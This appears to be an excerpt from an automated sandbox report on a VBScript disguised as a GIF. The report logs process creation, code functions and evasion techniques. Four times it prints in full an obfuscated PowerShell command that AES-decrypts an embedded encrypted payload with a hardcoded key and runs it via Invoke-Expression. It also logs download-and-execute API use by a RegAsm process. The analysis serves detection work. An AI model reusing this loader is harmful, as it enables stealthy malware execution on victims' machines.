                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041CB50
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B878328 pushad ; retf 1_2_00007FFD9B878329
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B87816B push ebx; ret 1_2_00007FFD9B87816A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8780D3 push ebx; ret 1_2_00007FFD9B87816A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00457106 push ecx; ret 3_2_00457119
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0045B11A push esp; ret 3_2_0045B141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00457A28 push eax; ret 3_2_00457A46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00434E56 push ecx; ret 3_2_00434E69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_10002806 push ecx; ret 3_2_10002819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_10009FD8 push esi; ret 3_2_10009FD9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044693D push ecx; ret 4_2_0044694D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044DB70 push eax; ret 4_2_0044DB84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044DB70 push eax; ret 4_2_0044DBAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00451D54 push eax; ret 4_2_00451D61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0044B090 push eax; ret 5_2_0044B0A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0044B090 push eax; ret 5_2_0044B0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00444E71 push ecx; ret 5_2_00444E81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00414060 push eax; ret 7_2_00414074
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00414060 push eax; ret 7_2_0041409C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00414039 push ecx; ret 7_2_00414049
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004164EB push 0000006Ah; retf 7_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00416553 push 0000006Ah; retf 7_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00416555 push 0000006Ah; retf 7_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00406EB0 ShellExecuteW,URLDownloadToFileW,3_2_00406EB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_0041AA4A

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: Possible double extension: gif.vbsStatic PE information: screensimplethingstohandlecream.gIF.vbs
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041CB50
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
